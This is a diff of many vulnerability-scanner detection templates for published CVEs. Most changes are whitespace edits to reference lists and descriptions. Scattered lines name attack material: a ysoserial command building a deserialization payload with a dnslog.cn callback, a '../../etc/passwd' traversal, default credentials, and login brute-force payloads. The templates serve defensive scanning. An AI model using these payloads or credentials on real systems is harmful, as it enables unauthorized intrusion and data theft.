- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests: requests:
- payloads: - payloads:


@ -7,10 +7,10 @@ info:
author: philippedelteil author: philippedelteil
tags: cve,cve2020,apache,dos tags: cve,cve2020,apache,dos
reference: reference:
- https://httpd.apache.org/security/vulnerabilities_24.html - https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030 - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369 - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490 - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
requests: requests:
- method: GET - method: GET


@ -7,9 +7,9 @@ info:
description: | description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot tags: cve,cve2021,lfi,buffalo,firmware,iot
requests: requests:


@ -7,9 +7,9 @@ info:
description: | description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot tags: cve,cve2021,buffalo,firmware,iot
requests: requests:


@ -7,9 +7,9 @@ info:
description: | description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13 - https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot tags: cve,cve2021,buffalo,firmware,iot
requests: requests:


@ -6,9 +6,9 @@ info:
severity: critical severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator. description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
reference: reference:
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe tags: cve,cve2021,rce,lucee,adobe
requests: requests:


@ -6,9 +6,9 @@ info:
severity: medium severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited. description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html - https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob tags: cve,cve2021,gitlab,ssrf,oob
requests: requests:


@ -6,8 +6,8 @@ info:
severity: medium severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference: reference:
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/ - https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss tags: cve,cve2021,wordpress,wp-plugin,xss
requests: requests:


@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,realteo,xss,wordpress tags: cve,cve2021,realteo,xss,wordpress
reference: reference:
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests: requests:
- method: GET - method: GET


@ -7,9 +7,9 @@ info:
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli tags: cve,cve2021,wordpress,wp-plugin,sqli
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests: requests:
- raw: - raw:


@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,mediumish,xss,wordpress tags: cve,cve2021,mediumish,xss,wordpress
reference: reference:
- https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests: requests:
- method: GET - method: GET


@ -6,8 +6,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss tags: cve,cve2021,wp-plugin,wordpress,xss
reference: reference:
- https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- https://wordpress.org/plugins/marmoset-viewer/#developers - https://wordpress.org/plugins/marmoset-viewer/#developers
requests: requests:
- method: GET - method: GET


@ -6,8 +6,8 @@ info:
severity: critical severity: critical
reference: https://paper.seebug.org/1476/ reference: https://paper.seebug.org/1476/
description: | description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data. Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server. Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
tags: cve,cve2021,apache,rce tags: cve,cve2021,apache,rce
requests: requests:


@ -10,9 +10,9 @@ info:
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
# Note:- This is detection template, To perform deserializes do as below # Note:- This is detection template, To perform deserializes do as below
# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
# `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value # `cat mad.ot | hex` and replace in <cus-obj> along with the url in std-String value
requests: requests:
- raw: - raw:


@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,moodle,jitsi,xss tags: cve,cve2021,moodle,jitsi,xss
reference: reference:
- https://github.com/udima-university/moodle-mod_jitsi/issues/67 - https://github.com/udima-university/moodle-mod_jitsi/issues/67
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812 - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests: requests:
- method: GET - method: GET


@ -5,13 +5,13 @@ info:
author: madrobot author: madrobot
severity: critical severity: critical
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob tags: cve,cve2021,ssrf,rce,exchange,oob
reference: reference:
- https://proxylogon.com/#timeline - https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855 - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests: requests:
- raw: - raw:


@ -5,8 +5,8 @@ info:
author: idealphase author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks. description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference: reference:
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651 - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical severity: critical
tags: cve,cve2021,pega,auth-bypass tags: cve,cve2021,pega,auth-bypass


@ -7,7 +7,7 @@ info:
author: pdteam author: pdteam
severity: critical severity: critical
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850 - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry tags: cve,cve2021,apache,tapestry
requests: requests:


@ -7,10 +7,10 @@ info:
tags: cve,cve2021,apache,solr,ssrf tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2. description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference: reference:
- https://www.anquanke.com/post/id/238201 - https://www.anquanke.com/post/id/238201
- https://ubuntu.com/security/CVE-2021-27905 - https://ubuntu.com/security/CVE-2021-27905
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
requests: requests:
- raw: - raw:


@ -7,8 +7,8 @@ info:
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2 description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
tags: ntopng,cve,cve2021 tags: ntopng,cve,cve2021
reference: reference:
- http://noahblog.360.cn/ntopng-multiple-vulnerabilities/ - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
requests: requests:
- method: GET - method: GET


@ -5,7 +5,7 @@ info:
author: gy741 author: gy741
severity: medium severity: medium
description: | description: |
Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
reference: reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149


@ -6,8 +6,8 @@ info:
tags: hpe,cve,cve2021,bypass tags: hpe,cve,cve2021,bypass
description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager. description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
reference: reference:
- https://www.tenable.com/security/research/tra-2021-15 - https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203
requests: requests:
- raw: - raw:


@ -7,8 +7,8 @@ info:
severity: medium severity: medium
tags: cve,cve2021,xss,ghost tags: cve,cve2021,xss,ghost
reference: reference:
- https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg
- https://nvd.nist.gov/vuln/detail/CVE-2021-29484 - https://nvd.nist.gov/vuln/detail/CVE-2021-29484
requests: requests:
- method: GET - method: GET


@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference: reference:
- https://www.ambionics.io/blog/laravel-debug-rce - https://www.ambionics.io/blog/laravel-debug-rce
- https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129 - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
tags: cve,cve2021,laravel,rce tags: cve,cve2021,laravel,rce
requests: requests:


@ -5,8 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
reference: reference:
- https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json
tags: cve,cve2021,expressjs,lfi tags: cve,cve2021,expressjs,lfi
requests: requests:


@ -4,8 +4,8 @@ info:
name: Ansi_up XSS name: Ansi_up XSS
description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0. description: The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.
reference: reference:
- https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf - https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf
- https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27
author: geeknik author: geeknik
severity: medium severity: medium


@ -7,9 +7,9 @@ info:
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
reference: reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
tags: cve,cve2021,ssrf,rce,exchange tags: cve,cve2021,ssrf,rce,exchange
requests: requests:


@ -6,8 +6,8 @@ info:
severity: critical severity: critical
description: Finding the Tieline Admin Panels with default credentials. description: Finding the Tieline Admin Panels with default credentials.
reference: reference:
- https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
- https://nvd.nist.gov/vuln/detail/CVE-2021-35336 - https://nvd.nist.gov/vuln/detail/CVE-2021-35336
tags: cve,cve2021,tieline,default-login tags: cve,cve2021,tieline,default-login
# admin:password # admin:password


@ -7,7 +7,7 @@ info:
severity: critical severity: critical
tags: cve,cve2021,openam,rce,java tags: cve,cve2021,openam,rce,java
reference: reference:
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests: requests:
- method: GET - method: GET


@ -13,7 +13,7 @@ requests:
headers: headers:
Content-Type: application/json Content-Type: application/json
body: | body: |
{"username":"admin","password":"123456"} {"username":"admin","password":"123456"}
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -18,7 +18,7 @@ requests:
gitlab_user: gitlab_user:
- 1234 - 1234
- admin - admin
# Enumerate valid user. # Enumerate valid user.
attack: clusterbomb attack: clusterbomb


@ -9,8 +9,8 @@ info:
- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page
- https://github.com/grafana/grafana/issues/14755 - https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user. # So make sure, not to attempt more than 4 password for same valid user.
requests: requests:
@ -42,7 +42,7 @@ requests:
{"user":"admin","password":"§grafana_password§"} {"user":"admin","password":"§grafana_password§"}
# grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin # grafana_password will be replaced with payloads and will attempt admin:prom-operator and admin:admin
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -8,9 +8,9 @@ info:
reference: reference:
- https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details.
# Update the list with more CNAMEs related to Azure # Update the list with more CNAMEs related to Azure
# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover.
# Do not report this without claiming the CNAME. # Do not report this without claiming the CNAME.
dns: dns:
- name: "{{FQDN}}" - name: "{{FQDN}}"


@ -6,10 +6,10 @@ info:
severity: info severity: info
tags: dns,takeover tags: dns,takeover
reference: reference:
- https://securitytrails.com/blog/subdomain-takeover-tips - https://securitytrails.com/blog/subdomain-takeover-tips
- https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/
- https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
dns: dns:
- name: "{{FQDN}}" - name: "{{FQDN}}"


@ -6,8 +6,8 @@ info:
severity: info severity: info
tags: exposure,api tags: exposure,api
reference: reference:
- https://github.com/dwisiswant0/wadl-dumper - https://github.com/dwisiswant0/wadl-dumper
- https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/
requests: requests:
- method: GET - method: GET


@ -6,8 +6,8 @@ info:
severity: info severity: info
tags: config,git,exposure tags: config,git,exposure
reference: reference:
- https://twitter.com/pratiky9967/status/1230001391701086208 - https://twitter.com/pratiky9967/status/1230001391701086208
- https://www.tenable.com/plugins/was/98595 - https://www.tenable.com/plugins/was/98595
requests: requests:
- method: GET - method: GET


@ -5,8 +5,8 @@ info:
author: ELSFA7110 author: ELSFA7110
severity: low severity: low
reference: reference:
- https://hackerone.com/reports/761158 - https://hackerone.com/reports/761158
- https://hackerone.com/reports/300539 - https://hackerone.com/reports/300539
tags: config,exposure,sharepoint tags: config,exposure,sharepoint
requests: requests:
